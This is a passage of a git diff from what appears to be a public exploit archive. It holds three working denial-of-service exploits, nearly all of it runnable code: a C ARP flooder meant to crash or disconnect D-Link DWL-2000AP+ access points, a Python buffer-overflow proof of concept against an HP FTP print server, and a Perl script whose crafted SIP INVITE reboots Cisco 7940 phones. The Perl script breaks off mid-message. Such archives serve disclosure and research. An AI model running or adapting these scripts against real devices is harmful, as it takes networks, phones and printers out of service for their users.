*)&ifr.ifr_ifru.ifru_addr)->sin_addr.s_addr; - - //get netmask - if(ioctl(fd, SIOCGIFNETMASK, (char*)&ifr) == -1)goto bad; - iface->netmask=((struct sockaddr_in *)&ifr.ifr_ifru.ifru_netmask)->sin_addr.s_addr; - - //get index - if (ioctl(fd, SIOCGIFINDEX, (char*)&ifr) == -1)goto bad; - iface->index=ifr.ifr_ifindex; - - //get link-type - if(ioctl(fd, SIOCGIFHWADDR, (char*)&ifr) == -1)goto bad; - switch (ifr.ifr_hwaddr.sa_family) { - //__linux__ encaps loop in eth frames - case ARPHRD_LOOPBACK: - case ARPHRD_ETHER: - case ARPHRD_METRICOM: - iface->type = DLT_EN10MB; - iface->l2hdr_size=ETHHDR_SIZE; - break; - case ARPHRD_PPP: - default: - goto bad; - } - }else goto bad; - //get MTU - if(ioctl(fd, SIOCGIFMTU, &ifr) == -1)goto bad; - iface->mtu=ifr.ifr_mtu; - } - - close(fd); - return 1; - - bad: - close(fd); - printf("%s\n","getting interface infos"); - exit(5); - } - - -int write_link(struct intf *iface,u_char *frame, u_int size){ - int c; - struct sockaddr_ll sa; - - memset(&sa, 0, sizeof (sa)); - - sa.sll_family = AF_PACKET; - sa.sll_ifindex = iface->index; - sa.sll_protocol = htons(ETH_P_ALL); - - c = sendto(iface->fd, frame, size, 0, (struct sockaddr *)&sa, sizeof (sa)); - - if (c != size){ - printf("error writing to bpf,, written:%d bytes\n",c); - exit(6); - } - return (c); -} - - - -int open_link(char *ifname){ - struct ifreq ifr; - int n = 1,fd; - - - fd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); - - if (fd == -1){ - printf("opening link %s",ifname); - exit(7); - } - - memset(&ifr, 0, sizeof (ifr)); - - SSTRNCPY(ifr.ifr_name,ifname,sizeof (ifr.ifr_name)); - - if (ioctl(fd, SIOCGIFHWADDR, &ifr) < 0 ){ - printf("%s\n","SIOCGIFHWADDR"); - exit(7); - } - - -#ifdef SO_BROADCAST -/* - * man 7 socket - * - * Set or get the broadcast flag. When enabled, datagram sockets - * receive packets sent to a broadcast address and they are allowed - * to send packets to a broadcast address. This option has no - * effect on stream-oriented sockets. - */ - if (setsockopt(fd, SOL_SOCKET, SO_BROADCAST, &n, sizeof(n)) == -1){ - printf("set sock opt: SO_BROADCAST"); - exit(7); - } - -#endif /* SO_BROADCAST */ - - return fd; - - -} - - - - #endif //linux - - -void adv(){ - - printf( "D-LINK DWL-2000AP+ with firmware version 2.11 is prone to two remote denial\n\ -of service vulnerability because it fails to handle arp flooding. \n\ -The first vuln causes the wireless link (802.11) to be resetted and the arp \n\ -table to be rebuilded. All clients connected to the AP are disconnected.\n\ -This bug can be triggered by sending lots of arp replies through the wired link\n\ -or the radio one at a very high speed.\n\ -The second vulnerability affects the wireless link only and are quite harder\n\ -to trigger but causes the AP firmware to crash making a manual reboot mandatory.\n\ -This bug can be triggered only if no other D-LINK ethernet products are visible \n\ -to AP, if wep encryption is enabled and it needs a very large amount of\n\ -arp-requests to be broadcasted through its wireless link at a very high speed. \n\ -This exploit works in the 90%% of cases because sometimes the AP is able to ban\n\ -the flooding client before the exploiting process is complete.\n\ -D-LINK doesn't support this product anymore so no solution is available.\n\ -Other products can be vulnerable.\n\ -\n\ -Not vulnerable: DWL-700AP\n\n"); - - - exit(0); -} - -void info(char *pname){ - printf( "\nThis program has been written to audit some D-LINK ethernet products\n" - "cuz it seems that some D-LINK AP will freeze if arp flooded\n\n" - "At the this time only D-LINK DWL-2000AP+ is reported to be vulnerable so\n" - "a good idea is to test other products...\n\n" - "Test 1: it makes the AP to disconnect all connected clients\n" - " a quik flood with arp-replies is sufficent to trigger this vuln\n" - " %s REPLY en1 @ @ 10.0.0.140 900000 0 00:de:09:a1:bb:c7\n\n" - "Test 2: it makes the AP firmware to crash making a manual reboot mandatory\n" - " a flood with a large amount of arp-requests\n" - " %s REQ en1 @ @ 10.0.0.140 9000000 0\n" - ,pname,pname); - - exit(0); -} - - -void usage(char *pname){ - printf( "usage:\n %s info or advisory \nor\n %s []\n" - "if srcMAC or srcIP is equal to '@' your own MAC/IP address will be used\n" - ,pname,pname); - exit(0); - -} - - - -main(int argc, char **argv){ - - int pktnr,a,c,ftype,err,delay; - u_char *srcmac,dstmac[6]; - u_int32_t srcip,dstip; - char *inv; - - if( argc < 2 )usage(argv[0]); - if(*argv[1]=='i')info(argv[0]); - if(*argv[1]=='a')adv(); - if(argc < ( (!strcmp(argv[1],"REQ")) ? 8 : 9 ) ) usage(argv[0]); - - if(!getifinfo(argv[2],&out_intf)){ - printf("error opening interface %s\n",argv[2]); - exit(2); - } - - - - - out_intf.fd=open_link(out_intf.name); - - - - printf("ARP FLOODER v0.1 by poplix - poplix@papuasia.org - 2006-12-09\n" - "written in a very few hours by taking pieces of code from some of mine ancient projects\n\n" - "\nflooding on %s, ",argv[2]); - - - if(!strcmp(argv[1],"REQ")){ - printf("flood type: REQ, "); - ftype=FTYPE_REQ; - } else { - printf("flood type: REPLY, "); - ftype=FTYPE_REPLY; - } - - if(*argv[3] != '@'){ - SMALLOC(srcmac,u_char); - if(!str_to_macaddr(argv[3],srcmac)){ - printf("\nerror while parsing srcmac: %s\n",argv[3]); - exit(2); - } - } else - srcmac=out_intf.l2addr; - - printf(" srcMAC: %s, ",macaddr_to_str(srcmac)); - - - if(ftype== FTYPE_REPLY && !str_to_macaddr(argv[8],dstmac)){ - printf("\nerror while parsing dstmac: %s\n",argv[8]); - exit(2); - } - if(ftype==FTYPE_REPLY) - printf("dstMAC: %s, ",argv[8]); - - - if(*argv[4] != '@'){ - ip_to_int(argv[4],&err); - if(err){ - printf("\nerror while parsing srcip: %s\n",argv[4]); - exit(2); - } - } else - srcip=out_intf.ipaddr; - printf("srcIP: %s, ",int_to_ip(srcip)); - - - dstip=ip_to_int(argv[5],&err); - if(err){ - printf("\nerror while parsing dstip: %s\n",argv[5]); - exit(2); - } - printf("dstIP: %s, ",argv[5]); - - - - pktnr=strtoul(argv[6],&inv,10); - if(*inv != 0){ - printf("\nerror while parsing pkts number: %s\n",argv[6]); - exit(1); - } - printf("pkts: %u, ",pktnr); - - - delay=(strtoul(argv[7],&inv,10) * 1000); - if(*inv != 0){ - printf("\nerror while parsing delay: %s\n",argv[6]); - exit(1); - } - printf("delay: %u ms\n",delay/1000); - printf("\nflooding...\n> 0"); - fflush(stdout); - - - for(a=0;a0 && (a%128) == 0) ){ - printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b> %u",a); - fflush(stdout); - } - if(ftype==FTYPE_REQ) - arp_request(dstip,srcip,srcmac); - else - arp_reply(dstip,dstmac,srcip,srcmac); - - if(delay>0)usleep(delay); - } - - printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b> %u",pktnr); - printf("\ndone\n"); - close(out_intf.fd); - exit(0); -} - -// milw0rm.com [2006-12-11] +/* + +ARP FLOODER v0.1 - poplix@papuasia.org - 2006-12-04 +designed to crash D-LINK DWL-2000AP+ + +compile with: gcc arpflood.c -o arpflood + + +*/ + + + +#define _BSD_SOURCE 1 +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include + + +#include +#include //param.h defines BSD in bsd systems +#include +#include +#include + +#include +#include +#include + +#ifdef BSD +#include + #include +#endif + + +#include +#include +#include +#include +#include + + + +#ifdef BSD +#include +#include +#endif + + +#ifdef __linux__ +#include +#include +#endif + +#ifndef DLT_EN10MB +#define DLT_EN10MB 1 +#endif + +#ifndef DLT_LOOP +#define DLT_LOOP 10 +#endif + +#ifndef DLT_PPP +#define DLT_PPP 9 +#endif + +#define ETHADDR_SIZE 6 +#define ETHHDR_SIZE 14 +#define ETHTYPE_IP 0x0800 +#define ETHERTYPE_ARP 0x0806 + + + + + +#define SMALLOC(x,y){x=(y*)malloc(sizeof(y));\ + if( x == NULL){printf("malloc out of memory");\ + exit(9);}\ + } + + + +#define CALLOC(x,y,z){ x=(y*)calloc(z,sizeof(y));if(x==NULL){\ + printf("calloc out of memory\n");\ + exit(9);}} + +#define SSTRNCPY(dst,src,len){strncpy(dst,src,len-1); dst[len-1]=0;} +#define SSTRNCAT(dst,src,len)strncat(dst,src, len - strlen(dst) - 1); + + + + + +#define ETHARP_PKT_SIZE 42 // eth + arpfixedsize + addresses size + + +#define FTYPE_REQ 1 +#define FTYPE_REPLY 2 + + + + +struct intf{ + char name[12]; + u_int index; + int fd; + u_int mtu; + u_int type; + + u_int32_t ipaddr; + u_int32_t netmask; + + u_char l2addr[6]; + u_int l2addr_size; + u_int l2hdr_size; + +}; + + + + +struct intf out_intf; + + + + +u_int ip_to_int(char *ip, int *err){ + char *inv,*s; + u_char ret[4]; + int a; + u_int tmp; + + if(ip == NULL || strlen(ip) < 7) return 0; + s=ip; + for( a=0; a < 4; a++){ + tmp=strtoul(s,&inv,10); + if( (*inv != '.' && *inv!=0) || tmp < 0 || tmp > 255 ) { + if(err != NULL)*err=1; + return 0; + } + ret[a]=tmp; + s=++inv; + } + + if(err != NULL)*err=0; + return *((u_int*)ret); + +} + + +int str_to_macaddr(char *str, u_char *dst){ + char *inv,*s; + int a; + u_int tmp; + + if(str == NULL || strlen(str) < 11) return 0; + s=str; + for( a=0; a < 6; a++){ + tmp=strtoul(s,&inv,16); + if( (*inv != ':' && *inv!=0) || tmp < 0x00 || tmp > 0xff ) + return 0; + + dst[a]=tmp; + s=++inv; + } + + + return 1; + +} + + + +char *int_to_ip(u_int32_t ip){ + u_char *tmp=(u_char *)&ip; + static char ret[16]; + memset(ret,0,sizeof(ret)); + sprintf(ret,"%u.%u.%u.%u",tmp[0] & 0xff,tmp[1] & 0xff,tmp[2] & 0xff,tmp[3] & 0xff); + return ret; + +} + + +char *macaddr_to_str(u_char *mac){ + static char ret[18]; + memset(ret,0,sizeof(ret)); + sprintf(ret,"%02x:%02x:%02x:%02x:%02x:%02x",mac[0],mac[1],mac[2],mac[3],mac[4],mac[5]); + return ret; + +} + + + + + + + + +int build_ether_hdr(u_char *dst, u_char* src,u_short type,u_char* dstbuff){ + memcpy(dstbuff,dst,ETHADDR_SIZE); + memcpy(dstbuff+6,src,ETHADDR_SIZE); + + *( (u_short*)(dstbuff+12) ) = htons(type); + + return 1; + +} + + + + +int build_arp_hdr(u_char *hdst,u_int32_t pdst,u_char* hsrc,u_int32_t psrc,u_short arpop,u_char* dstbuff){ + struct arphdr* hdr= (struct arphdr*)dstbuff; + u_int off; + + hdr->ar_hrd=htons(ARPHRD_ETHER); + hdr->ar_pro=htons(ETHTYPE_IP); + hdr->ar_hln=ETHADDR_SIZE; + hdr->ar_pln=4; + hdr->ar_op=htons(arpop); + + off=8; + + memcpy(dstbuff + off,hsrc,ETHADDR_SIZE); + off+=ETHADDR_SIZE; + + memcpy(dstbuff + off,(u_char*)&psrc,4); + off+=4, + + memcpy(dstbuff + off,hdst,ETHADDR_SIZE); + off+=ETHADDR_SIZE; + + memcpy(dstbuff + off,(u_char*)&pdst,4); + + return 1; +} + + + +int arp_request(u_int32_t ripaddr,u_int32_t ipsrc,u_char *macsrc){ + u_char arpbuff[ETHARP_PKT_SIZE]; + + if(macsrc==NULL)macsrc=out_intf.l2addr; + if(ipsrc==0)ipsrc=out_intf.ipaddr; + build_ether_hdr((u_char*)"\xff\xff\xff\xff\xff\xff",macsrc,ETHERTYPE_ARP,arpbuff); + + build_arp_hdr((u_char*)"\x0\x0\x0\x0\x0\x0", + ripaddr, + macsrc, + ipsrc, + ARPOP_REQUEST, + arpbuff + ETHHDR_SIZE + ); + + write_link(&out_intf,arpbuff,sizeof(arpbuff)); + + return 1; +} + + + + +int arp_reply(u_int32_t ipdst,u_char *dstmac,u_int32_t ipsrc,u_char *srcmac){ + u_char arpbuff[ETHHDR_SIZE + ETHARP_PKT_SIZE]; + + if(srcmac==NULL)srcmac=out_intf.l2addr; + + build_ether_hdr(dstmac, srcmac, ETHERTYPE_ARP, arpbuff); + build_arp_hdr(dstmac, ipdst, srcmac, ipsrc, ARPOP_REPLY, arpbuff+ETHHDR_SIZE); + write_link(&out_intf,arpbuff,sizeof(arpbuff)); + + return 1; +} + + + + +#ifdef BSD + +int getifinfo(char *name,struct intf *iface){ + struct ifaddrs *ifap, *ifa; + int find=0; + + int mib[]={CTL_NET,AF_ROUTE,0,AF_LINK,NET_RT_IFLIST,0}; + size_t len; + u_char *buff, *next, *end; + struct if_msghdr *ifm; + struct sockaddr_dl *sdl; + + + // get the list + if(getifaddrs(&ifap) < 0) return 0; + + if(!ifap) return 0; + //nota che ogni inf compare due volte in lista, una volta come AF_LINK e una AF_INET + for(ifa = ifap; ifa; ifa = ifa->ifa_next) + if(!strcmp(name,ifa->ifa_name)){ + //copy only the first time + if(find==0){ + memset(iface->name,0,sizeof(iface->name)); + SSTRNCPY(iface->name,name,sizeof(iface->name)); + } + find=1; + if(ifa->ifa_addr->sa_family == AF_LINK){ + iface->mtu=((struct if_data*)ifa->ifa_data)->ifi_mtu; + + switch(((struct if_data*)ifa->ifa_data)->ifi_type){ + case IFT_ETHER: + iface->type=DLT_EN10MB; + iface->l2hdr_size=ETHHDR_SIZE; + break; + case IFT_GIF: + case IFT_LOOP: + iface->type=DLT_LOOP; + iface->l2hdr_size=0; + break; + case IFT_PPP: + iface->type = DLT_PPP; + default: + freeifaddrs(ifap); + return 0; + } + + } + if(ifa->ifa_addr->sa_family == AF_INET){ + iface->ipaddr = (u_int32_t) ((struct sockaddr_in*)ifa->ifa_addr)->sin_addr.s_addr; + iface->netmask = (u_int32_t) ((struct sockaddr_in*)ifa->ifa_netmask)->sin_addr.s_addr; + } + } + + freeifaddrs(ifap); + + //get hardware address + if (sysctl(mib, ETHADDR_SIZE, NULL, &len, NULL, 0) == -1){ + printf("getting hardware address\n"); + exit(1); + } + + CALLOC(buff,u_char,len); + if (sysctl(mib, ETHADDR_SIZE, buff, &len, NULL, 0) < 0){ + free(buff); + printf("getting hardware address\n"); + exit(1); + } + end = buff + len; + + for (next = buff ; next < end ; next += ifm->ifm_msglen){ + ifm = (struct if_msghdr *)next; + if (ifm->ifm_type == RTM_IFINFO){ + sdl = (struct sockaddr_dl *)(ifm + 1); + if (strncmp(&sdl->sdl_data[0], iface->name, sdl->sdl_nlen) == 0){ + memcpy(iface->l2addr,LLADDR(sdl),ETHADDR_SIZE); + break; + } + } + } + free(buff); + + iface->index=0; // dont care + + return find; + + + } + + +//int wrink(u_int fd,u_char *frame, u_int size){ +int write_link(struct intf *iface,u_char *frame, u_int size){ + int c; + + if (iface->fd < 0){ + printf("%s\n","bpf error"); + exit(2); + } + c = write(iface->fd, frame, size); + + if (c != size){ + printf("error writing to bpf,, written:%d bytes\n",c); + exit(3); + } + + return (c); +} + + +int open_link(char* ifname){ + int i, fd; + char devname[12]; + struct ifreq ifr; + + for (i=0; i<100; i++){ + sprintf(devname, "/dev/bpf%u", i); + fd = open(devname, O_RDWR); + if (fd == -1 && errno == EBUSY) + continue; + else + break; + } + + if (fd == -1){ + printf("unable to open bpf\n"); + exit(4); + } + + + SSTRNCPY(ifr.ifr_name, ifname, sizeof(ifr.ifr_name)); + + if (ioctl(fd, BIOCSETIF, (caddr_t)&ifr) == -1){ + printf("attaching interface to bpf\n"); + exit(4); + } + + + return (fd); +} + + +#endif +//end of BSD code + + + +#ifdef __linux__ + //fetifinfo sets:ifname, mtu, link-type,layer4 address,layer4 netmask, + +int getifinfo(char *name,struct intf *iface){ + int fd,find=0; + struct ifconf ifc; + struct ifreq ibuf[16], ifr, *ifrp, *ifend; + struct sockaddr_in sa; + + + + + if ( (fd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) return 0; + + memset(ibuf, 0, sizeof(struct ifreq)*16); + ifc.ifc_len = sizeof(ibuf); + ifc.ifc_buf = (caddr_t) ibuf; + + /* gets interfaces list */ + if ( ioctl(fd, SIOCGIFCONF, (char*)&ifc) == -1 || + ifc.ifc_len < sizeof(struct ifreq) ) + goto bad; + + /* ifrp points to buffer and ifend points to buffer's end */ + ifrp = ibuf; + ifend = (struct ifreq*) ((char*)ibuf + ifc.ifc_len); + + for (; ifrp < ifend; ifrp++) { + if(strcmp(ifrp->ifr_name,name))continue; + find=1; + SSTRNCPY(ifr.ifr_name, ifrp->ifr_name, sizeof(ifr.ifr_name)); + + //get if flags + if(ioctl(fd, SIOCGIFFLAGS, (char*)&ifr) == -1) + goto bad; + + //if is down + if ( !(ifr.ifr_flags & IFF_UP) )goto bad; + + SSTRNCPY(iface->name, ifr.ifr_name, sizeof(iface->name)); + + //get l3 addr + if (ioctl(fd, SIOCGIFADDR, (char*)&ifr) == -1)goto bad; + + if (ifr.ifr_ifru.ifru_addr.sa_family == AF_INET) { + //save addr + iface->ipaddr=((struct sockaddr_in *)&ifr.ifr_ifru.ifru_addr)->sin_addr.s_addr; + + //get netmask + if(ioctl(fd, SIOCGIFNETMASK, (char*)&ifr) == -1)goto bad; + iface->netmask=((struct sockaddr_in *)&ifr.ifr_ifru.ifru_netmask)->sin_addr.s_addr; + + //get index + if (ioctl(fd, SIOCGIFINDEX, (char*)&ifr) == -1)goto bad; + iface->index=ifr.ifr_ifindex; + + //get link-type + if(ioctl(fd, SIOCGIFHWADDR, (char*)&ifr) == -1)goto bad; + switch (ifr.ifr_hwaddr.sa_family) { + //__linux__ encaps loop in eth frames + case ARPHRD_LOOPBACK: + case ARPHRD_ETHER: + case ARPHRD_METRICOM: + iface->type = DLT_EN10MB; + iface->l2hdr_size=ETHHDR_SIZE; + break; + case ARPHRD_PPP: + default: + goto bad; + } + }else goto bad; + //get MTU + if(ioctl(fd, SIOCGIFMTU, &ifr) == -1)goto bad; + iface->mtu=ifr.ifr_mtu; + } + + close(fd); + return 1; + + bad: + close(fd); + printf("%s\n","getting interface infos"); + exit(5); + } + + +int write_link(struct intf *iface,u_char *frame, u_int size){ + int c; + struct sockaddr_ll sa; + + memset(&sa, 0, sizeof (sa)); + + sa.sll_family = AF_PACKET; + sa.sll_ifindex = iface->index; + sa.sll_protocol = htons(ETH_P_ALL); + + c = sendto(iface->fd, frame, size, 0, (struct sockaddr *)&sa, sizeof (sa)); + + if (c != size){ + printf("error writing to bpf,, written:%d bytes\n",c); + exit(6); + } + return (c); +} + + + +int open_link(char *ifname){ + struct ifreq ifr; + int n = 1,fd; + + + fd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); + + if (fd == -1){ + printf("opening link %s",ifname); + exit(7); + } + + memset(&ifr, 0, sizeof (ifr)); + + SSTRNCPY(ifr.ifr_name,ifname,sizeof (ifr.ifr_name)); + + if (ioctl(fd, SIOCGIFHWADDR, &ifr) < 0 ){ + printf("%s\n","SIOCGIFHWADDR"); + exit(7); + } + + +#ifdef SO_BROADCAST +/* + * man 7 socket + * + * Set or get the broadcast flag. When enabled, datagram sockets + * receive packets sent to a broadcast address and they are allowed + * to send packets to a broadcast address. This option has no + * effect on stream-oriented sockets. + */ + if (setsockopt(fd, SOL_SOCKET, SO_BROADCAST, &n, sizeof(n)) == -1){ + printf("set sock opt: SO_BROADCAST"); + exit(7); + } + +#endif /* SO_BROADCAST */ + + return fd; + + +} + + + + #endif //linux + + +void adv(){ + + printf( "D-LINK DWL-2000AP+ with firmware version 2.11 is prone to two remote denial\n\ +of service vulnerability because it fails to handle arp flooding. \n\ +The first vuln causes the wireless link (802.11) to be resetted and the arp \n\ +table to be rebuilded. All clients connected to the AP are disconnected.\n\ +This bug can be triggered by sending lots of arp replies through the wired link\n\ +or the radio one at a very high speed.\n\ +The second vulnerability affects the wireless link only and are quite harder\n\ +to trigger but causes the AP firmware to crash making a manual reboot mandatory.\n\ +This bug can be triggered only if no other D-LINK ethernet products are visible \n\ +to AP, if wep encryption is enabled and it needs a very large amount of\n\ +arp-requests to be broadcasted through its wireless link at a very high speed. \n\ +This exploit works in the 90%% of cases because sometimes the AP is able to ban\n\ +the flooding client before the exploiting process is complete.\n\ +D-LINK doesn't support this product anymore so no solution is available.\n\ +Other products can be vulnerable.\n\ +\n\ +Not vulnerable: DWL-700AP\n\n"); + + + exit(0); +} + +void info(char *pname){ + printf( "\nThis program has been written to audit some D-LINK ethernet products\n" + "cuz it seems that some D-LINK AP will freeze if arp flooded\n\n" + "At the this time only D-LINK DWL-2000AP+ is reported to be vulnerable so\n" + "a good idea is to test other products...\n\n" + "Test 1: it makes the AP to disconnect all connected clients\n" + " a quik flood with arp-replies is sufficent to trigger this vuln\n" + " %s REPLY en1 @ @ 10.0.0.140 900000 0 00:de:09:a1:bb:c7\n\n" + "Test 2: it makes the AP firmware to crash making a manual reboot mandatory\n" + " a flood with a large amount of arp-requests\n" + " %s REQ en1 @ @ 10.0.0.140 9000000 0\n" + ,pname,pname); + + exit(0); +} + + +void usage(char *pname){ + printf( "usage:\n %s info or advisory \nor\n %s []\n" + "if srcMAC or srcIP is equal to '@' your own MAC/IP address will be used\n" + ,pname,pname); + exit(0); + +} + + + +main(int argc, char **argv){ + + int pktnr,a,c,ftype,err,delay; + u_char *srcmac,dstmac[6]; + u_int32_t srcip,dstip; + char *inv; + + if( argc < 2 )usage(argv[0]); + if(*argv[1]=='i')info(argv[0]); + if(*argv[1]=='a')adv(); + if(argc < ( (!strcmp(argv[1],"REQ")) ? 8 : 9 ) ) usage(argv[0]); + + if(!getifinfo(argv[2],&out_intf)){ + printf("error opening interface %s\n",argv[2]); + exit(2); + } + + + + + out_intf.fd=open_link(out_intf.name); + + + + printf("ARP FLOODER v0.1 by poplix - poplix@papuasia.org - 2006-12-09\n" + "written in a very few hours by taking pieces of code from some of mine ancient projects\n\n" + "\nflooding on %s, ",argv[2]); + + + if(!strcmp(argv[1],"REQ")){ + printf("flood type: REQ, "); + ftype=FTYPE_REQ; + } else { + printf("flood type: REPLY, "); + ftype=FTYPE_REPLY; + } + + if(*argv[3] != '@'){ + SMALLOC(srcmac,u_char); + if(!str_to_macaddr(argv[3],srcmac)){ + printf("\nerror while parsing srcmac: %s\n",argv[3]); + exit(2); + } + } else + srcmac=out_intf.l2addr; + + printf(" srcMAC: %s, ",macaddr_to_str(srcmac)); + + + if(ftype== FTYPE_REPLY && !str_to_macaddr(argv[8],dstmac)){ + printf("\nerror while parsing dstmac: %s\n",argv[8]); + exit(2); + } + if(ftype==FTYPE_REPLY) + printf("dstMAC: %s, ",argv[8]); + + + if(*argv[4] != '@'){ + ip_to_int(argv[4],&err); + if(err){ + printf("\nerror while parsing srcip: %s\n",argv[4]); + exit(2); + } + } else + srcip=out_intf.ipaddr; + printf("srcIP: %s, ",int_to_ip(srcip)); + + + dstip=ip_to_int(argv[5],&err); + if(err){ + printf("\nerror while parsing dstip: %s\n",argv[5]); + exit(2); + } + printf("dstIP: %s, ",argv[5]); + + + + pktnr=strtoul(argv[6],&inv,10); + if(*inv != 0){ + printf("\nerror while parsing pkts number: %s\n",argv[6]); + exit(1); + } + printf("pkts: %u, ",pktnr); + + + delay=(strtoul(argv[7],&inv,10) * 1000); + if(*inv != 0){ + printf("\nerror while parsing delay: %s\n",argv[6]); + exit(1); + } + printf("delay: %u ms\n",delay/1000); + printf("\nflooding...\n> 0"); + fflush(stdout); + + + for(a=0;a0 && (a%128) == 0) ){ + printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b> %u",a); + fflush(stdout); + } + if(ftype==FTYPE_REQ) + arp_request(dstip,srcip,srcmac); + else + arp_reply(dstip,dstmac,srcip,srcmac); + + if(delay>0)usleep(delay); + } + + printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b> %u",pktnr); + printf("\ndone\n"); + close(out_intf.fd); + exit(0); +} + +// milw0rm.com [2006-12-11] diff --git a/platforms/hardware/dos/2961.py b/platforms/hardware/dos/2961.py index da43ba927..3797e8a23 100755 --- a/platforms/hardware/dos/2961.py +++ b/platforms/hardware/dos/2961.py @@ -1,60 +1,60 @@ -#!/usr/bin/python - -import sys -from ftplib import FTP - -print "Hewlett-Packard FTP Print Server Version 2.4.5 Buffer Overflow (POC)" -print "Copyright (c) Joxean Koret" -print - -if len(sys.argv) == 1: - print "Usage: %s " % sys.argv[0] - sys.exit(0) - -target = sys.argv[1] - -print "[+] Running attack against " + target - -try: - ftp = FTP(target) -except: - print "[!] Can't connect to target", target, ".", sys.exc_info()[1] - sys.exit(0) -try: - msg = ftp.login() # Login anonymously - print msg -except: - print "[!] Error logging anonymously.",sys.exc_info()[1] - sys.exit(0) - -buf = "./A" -iMax = 9 - -for i in range(iMax): - buf += buf - -print "[+] Sending buffer of",len(buf[0:3000]),"byte(s) ... " - -try: - print "[+] Please, note that sometimes your connection will not be dropped. " - ftp.retrlines("LIST " + buf[0:3000]) - print "[!] Exploit doesn't work :(" - print - sys.exit(0) -except: - print "[+] Apparently exploit works. Verifying ... " - print sys.exc_info()[1] - -ftp2 = FTP(target) - -try: - msg = ftp2.login() - print "[!] No, it doesn't work :( " - print - print msg - sys.exit(0) -except: - print "[+] Yes, it works." - print sys.exc_info()[1] - -# milw0rm.com [2006-12-19] +#!/usr/bin/python + +import sys +from ftplib import FTP + +print "Hewlett-Packard FTP Print Server Version 2.4.5 Buffer Overflow (POC)" +print "Copyright (c) Joxean Koret" +print + +if len(sys.argv) == 1: + print "Usage: %s " % sys.argv[0] + sys.exit(0) + +target = sys.argv[1] + +print "[+] Running attack against " + target + +try: + ftp = FTP(target) +except: + print "[!] Can't connect to target", target, ".", sys.exc_info()[1] + sys.exit(0) +try: + msg = ftp.login() # Login anonymously + print msg +except: + print "[!] Error logging anonymously.",sys.exc_info()[1] + sys.exit(0) + +buf = "./A" +iMax = 9 + +for i in range(iMax): + buf += buf + +print "[+] Sending buffer of",len(buf[0:3000]),"byte(s) ... " + +try: + print "[+] Please, note that sometimes your connection will not be dropped. " + ftp.retrlines("LIST " + buf[0:3000]) + print "[!] Exploit doesn't work :(" + print + sys.exit(0) +except: + print "[+] Apparently exploit works. Verifying ... " + print sys.exc_info()[1] + +ftp2 = FTP(target) + +try: + msg = ftp2.login() + print "[!] No, it doesn't work :( " + print + print msg + sys.exit(0) +except: + print "[+] Yes, it works." + print sys.exc_info()[1] + +# milw0rm.com [2006-12-19] diff --git a/platforms/hardware/dos/3526.pl b/platforms/hardware/dos/3526.pl index 30226c23c..10d14eda0 100755 --- a/platforms/hardware/dos/3526.pl +++ b/platforms/hardware/dos/3526.pl @@ -1,66 +1,66 @@ -#!/usr/bin/perl -# Title: Cisco 7940 SIP INVITE remote DOS -# Date: February 19, 2007 -# ID: KIPH2 -# -# Synopsis: After sending a cra fted INVITE message the device immediately -# reboots. The phone does not check properly the sipURI field of the -# Remote-Party-ID in the message. -# -# The vendor was informed and acknowledged the vulnerability. This -# vulnerability was identified by the Madynes research team at INRIA -# Lorraine, using the Madynes VoIP fuzzer. -# -# Background: SIP is the IETF standardized (RFCs 2543 and 3261) protocol -# for VoIP signalization. SIP is an ASCII based INVITE message is used to -# initiate and maintain a communication session. -# -# Affected devices: Cisco phone 7940/7960 running firmware P0S3-07-4-00 -# -# Unaffected: devices running firmware POS8-6-0 -# -# Description: After receiving one crafted SIP INVITE message, the -# affected device reboots immediately. The proof of concept code can be -# used to demonstrate the vulnerability. -# -# Resolution: -# -# Fixed software is available from the vendor and customers following -# recommended best practices (ie segregating VOIP traffic from data) will -# be protected from malicious traffic in most situations. -# -# Credits: -# -# Humberto J. Abdelnur (Ph.D Student) -# -# Radu State (Ph.D) -# -# Olivier Festor (Ph.D) -# -# This vulnerability was identified by the Madynes research team at INRIA -# -# Lorraine, using the Madynes VoIP fuzzer. -# -# http://madynes.loria.fr/ - -use IO::Socket::INET; - -die "Usage $0 " unless ($ARGV[2]); - - -$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], - -Proto=>'udp', - -PeerAddr=>$ARGV[0]); - - -$msg="INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP -192.168.1.2;branch=z9hG4jk\r\nFrom: sip:chirimolla -\@192.168.1.2;tag=qwzng\r\nTo: \r -\nCall-ID: fosforito\@192.168.1.1\r\nCSeq: 921 INVITE\r -\nRemote-Party-ID: csip:7940-1\@192.168.\xd1.7\r\n\r\n"; - -$socket->send($msg); - -# milw0rm.com [2007-03-20] +#!/usr/bin/perl +# Title: Cisco 7940 SIP INVITE remote DOS +# Date: February 19, 2007 +# ID: KIPH2 +# +# Synopsis: After sending a cra fted INVITE message the device immediately +# reboots. The phone does not check properly the sipURI field of the +# Remote-Party-ID in the message. +# +# The vendor was informed and acknowledged the vulnerability. This +# vulnerability was identified by the Madynes research team at INRIA +# Lorraine, using the Madynes VoIP fuzzer. +# +# Background: SIP is the IETF standardized (RFCs 2543 and 3261) protocol +# for VoIP signalization. SIP is an ASCII based INVITE message is used to +# initiate and maintain a communication session. +# +# Affected devices: Cisco phone 7940/7960 running firmware P0S3-07-4-00 +# +# Unaffected: devices running firmware POS8-6-0 +# +# Description: After receiving one crafted SIP INVITE message, the +# affected device reboots immediately. The proof of concept code can be +# used to demonstrate the vulnerability. +# +# Resolution: +# +# Fixed software is available from the vendor and customers following +# recommended best practices (ie segregating VOIP traffic from data) will +# be protected from malicious traffic in most situations. +# +# Credits: +# +# Humberto J. Abdelnur (Ph.D Student) +# +# Radu State (Ph.D) +# +# Olivier Festor (Ph.D) +# +# This vulnerability was identified by the Madynes research team at INRIA +# +# Lorraine, using the Madynes VoIP fuzzer. +# +# http://madynes.loria.fr/ + +use IO::Socket::INET; + +die "Usage $0 " unless ($ARGV[2]); + + +$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], + +Proto=>'udp', + +PeerAddr=>$ARGV[0]); + + +$msg="INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 